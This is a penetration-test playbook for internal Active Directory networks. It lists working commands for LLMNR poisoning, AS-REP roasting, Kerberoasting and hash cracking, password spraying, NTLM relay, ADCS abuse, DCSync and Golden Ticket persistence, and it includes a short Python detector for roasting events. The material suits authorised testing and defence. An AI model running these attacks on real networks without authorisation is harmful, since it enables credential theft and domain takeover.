Playbook: Internal Network Penetration Test

Scope: Internal corporate network; assume foothold as domain user (or unauthenticated on LAN)
Prerequisites: VPN or physical LAN access; scope document from client; low-priv domain account (ideal)
MITRE Coverage: T1046, T1110, T1558.003, T1550.002, T1021, T1078

Objective

Identify exploitable vulnerabilities on the internal network, escalate privileges, and demonstrate impact (domain admin, sensitive data access, lateral movement to key systems).


Steps

Phase 1: Network Discovery

  1. Identify your position: ip a, ip route, cat /etc/resolv.conf.
  2. ARP scan local subnet: arp-scan -l or netdiscover -r 10.10.10.0/24.
  3. Find DC(s): nslookup -type=SRV _ldap._tcp.dc._msdcs.domain.local.
  4. Port scan all live hosts (top ports first for speed, then -p- on interesting ones):
    nmap -T4 --top-ports 1000 -oA nmap_top1000 10.10.10.0/24
    nmap -p- -sV -sC -T4 -oA nmap_full 10.10.10.1   # DC specifically
    
  5. Identify running services: SMB, HTTP/S, RDP, SSH, WinRM, LDAP, MSSQL, etc.

Phase 2: Low-Hanging Fruit

  1. Anonymous/null SMB: smbclient -L //dc01 -N, smbmap -H dc01.
  2. Default credentials: Common services (SNMP public, web apps, Tomcat tomcat:tomcat).
  3. LLMNR/NBT-NS poisoning: Run sudo responder -I eth0 -v in background for 15–30 min.
  4. SMB signing check: nxc smb 10.10.10.0/24 --gen-relay-list relay-targets.txt.
  5. AS-REP Roasting (no creds needed): GetNPUsers.py domain.local/ -usersfile users.txt -no-pass.

Phase 3: Authenticated Enumeration (with domain account)

  1. BloodHound collection:
    bloodhound-python -u user -p pass -d domain.local -dc dc01.domain.local -c All
    
  2. Kerberoasting:
    GetUserSPNs.py domain.local/user:pass -dc-ip dc01 -request -outputfile krb.txt
    hashcat -m 13100 krb.txt /usr/share/wordlists/rockyou.txt
    
  3. Enumerate users, groups, GPOs, shares:
    nxc smb dc01 -u user -p pass --users
    nxc smb 10.10.10.0/24 -u user -p pass --shares
    ldapdomaindump -u 'domain\user' -p pass dc01
    
  4. Enumerate local admins on all hosts:
    nxc smb 10.10.10.0/24 -u user -p pass --local-groups Administrators
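
Detection-side counterpart to the AS-REP Roasting step in Phase 2 and the Kerberoasting step in this phase, added here as an example and not part of the original playbook: it scans constructed DC security events (4768 with pre-auth type 0, 4769 RC4 service tickets for non-machine SPNs) and groups candidates by source IP. The flat key=value log format, the CORP.LOCAL names and the SPN threshold are assumptions.

```python
"""Flag Kerberoast / AS-REP roast activity in DC security events.

Constructed example: each line is a flat key=value record distilled from
Event ID 4768 (TGT request) and 4769 (service ticket request)."""
from collections import defaultdict

# Constructed sample: one client pulls RC4 service tickets for several
# user-account SPNs and a no-pre-auth TGT, alongside benign requests.
SAMPLE_LOG = """\
EventID=4769 TargetUserName=alice@CORP.LOCAL ServiceName=DC01$ TicketEncryptionType=0x12 IpAddress=10.10.10.20
EventID=4769 TargetUserName=bob@CORP.LOCAL ServiceName=svc_sql TicketEncryptionType=0x17 IpAddress=10.10.10.55
EventID=4769 TargetUserName=bob@CORP.LOCAL ServiceName=svc_web TicketEncryptionType=0x17 IpAddress=10.10.10.55
EventID=4769 TargetUserName=bob@CORP.LOCAL ServiceName=svc_backup TicketEncryptionType=0x17 IpAddress=10.10.10.55
EventID=4769 TargetUserName=carol@CORP.LOCAL ServiceName=krbtgt TicketEncryptionType=0x17 IpAddress=10.10.10.30
EventID=4768 TargetUserName=legacy_app ServiceName=krbtgt PreAuthType=0 TicketEncryptionType=0x17 IpAddress=10.10.10.55
EventID=4768 TargetUserName=alice ServiceName=krbtgt PreAuthType=2 TicketEncryptionType=0x12 IpAddress=10.10.10.20
"""

RC4_HMAC = "0x17"  # etype 23 (RC4): the ticket type hashcat -m 13100 cracks

def parse_line(line):
    return dict(field.split("=", 1) for field in line.split())

def is_kerberoast_candidate(ev):
    # RC4 ticket for a user-account SPN (machine$ and krbtgt are expected noise)
    svc = ev.get("ServiceName", "")
    return (ev.get("EventID") == "4769"
            and ev.get("TicketEncryptionType") == RC4_HMAC
            and not svc.endswith("$")
            and svc.lower() != "krbtgt")

def is_asrep_candidate(ev):
    # TGT issued without pre-authentication: the AS-REP is offline-crackable
    return ev.get("EventID") == "4768" and ev.get("PreAuthType") == "0"

def analyze(log_text, spn_threshold=3):
    """Return {source_ip: [alert, ...]} for suspicious clients."""
    rc4_spns, alerts = defaultdict(set), defaultdict(list)
    for line in log_text.splitlines():
        ev = parse_line(line)
        ip = ev.get("IpAddress", "?")
        if is_kerberoast_candidate(ev):
            rc4_spns[ip].add(ev["ServiceName"])
        if is_asrep_candidate(ev):
            alerts[ip].append(f"AS-REP roast: no-preauth TGT for {ev['TargetUserName']}")
    for ip, spns in rc4_spns.items():
        if len(spns) >= spn_threshold:
            alerts[ip].append(f"Kerberoast: {len(spns)} RC4 tickets for {sorted(spns)}")
    return dict(alerts)
```

Feeding real 4768/4769 exports through the same rules (with a time window per source) is the usual way to spot a collection run like the one above during or after an engagement.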
    

Phase 4: Credential Attacks

  1. Password spraying (careful with lockout threshold):
    nxc smb dc01 -u users.txt -p 'Password123!' --continue-on-success
    nxc smb dc01 -u users.txt -p 'Summer2024!'
    
  2. Crack any captured hashes (Responder, Kerberoast, AS-REP).
  3. NTLM relay if signing disabled:
    ntlmrelayx.py -tf relay-targets.txt -smb2support -i
    

Phase 5: Privilege Escalation

  1. Review BloodHound for attack paths from owned accounts to DA.
  2. Exploit ACL misconfigurations (GenericAll, WriteDACL, ForceChangePassword).
  3. Check for vulnerable services, token abuse on compromised hosts.
  4. ADCS attacks if Certificate Services is present:
    certipy find -u user@domain.local -p pass -dc-ip dc01
    certipy req -u user@domain.local -p pass -ca ca-server -template VulnerableTemplate
    

Phase 6: Domain Compromise

  1. DCSync (if DA or DCSync rights):
    secretsdump.py domain/da_user:pass@dc01.domain.local
    
  2. Dump KRBTGT hash → create Golden Ticket (persistence / full domain control).
  3. Access critical systems: file servers, databases, email.
  4. Demonstrate impact: read sensitive data, show access to crown jewels.

Cleanup / Deconfliction

  • Remove any uploaded payloads or persistence mechanisms.
  • Clear Responder logs (contain sensitive hashes).
  • Notify client POC of any high-risk findings immediately (e.g., clear-text credentials discovered).
  • Keep timestamped activity log throughout for report.

Notes & Gotchas

  • Check domain password lockout policy before spraying: nxc smb dc01 -u user -p pass --pass-pol.
  • SMB relay fails if target has SMB signing enabled — always check first.
  • BloodHound collection with -c All is noisy; use -c DCOnly if stealth matters.
  • ADCS is present in ~90% of enterprise environments and often misconfigured.